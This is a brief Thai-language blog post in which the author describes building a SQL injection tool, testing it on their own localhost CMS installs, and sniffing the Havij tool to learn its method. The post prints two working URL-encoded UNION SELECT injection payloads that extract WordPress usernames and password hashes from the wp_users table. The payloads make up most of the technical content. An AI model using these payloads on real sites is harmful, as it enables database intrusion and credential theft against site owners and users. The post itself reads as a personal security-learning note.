เนื่องจากผมเขียน SQLi Tool มาลองกับ localhost ตัวเองคือเขียนไฟล์ php ให้บัค SQLi แล้วลองสแกนดู เครื่องผมลง cms ไว้ 3 ตัวคือ wp,smf,joomla ก็เลยลอง dump ข้อมูลใน wp ดูมันไม่ได้ ว่าจะลองเขียนใหม่เลยลอง sniff เจ้า havij ดูเพื่อจะดูว่ามันทำยังไง แล้วเราก็มาเขียนใน tool เรา แอบเกรียน ฮร่าๆ


อ่า sniff เสร็จแล้วผลลัพธ์ก็คือ
-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(wp_users.user_login%20as%20char)),0x27,0x7e)%20FROM%20`wordpress`.wp_users%20LIMIT%200,1)%20,0x31303235343830303536,0x31303235343830303536-- ## Dump User -999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(wp_users.user_pass%20as%20char)),0x27,0x7e)%20FROM%20`wordpress`.wp_users%20LIMIT%200,1)%20,0x31303235343830303536,0x31303235343830303536-- ## Dump Pass
โอเคพอจะได้แนวแล้ว ไปเขียนต่อดีกว่า ขอขอบคุณ Socket Sniff ที่ช่วยในการ Sniff ครั้งนี้ด้วยครับ ~
ไม่มีความคิดเห็น:
แสดงความคิดเห็น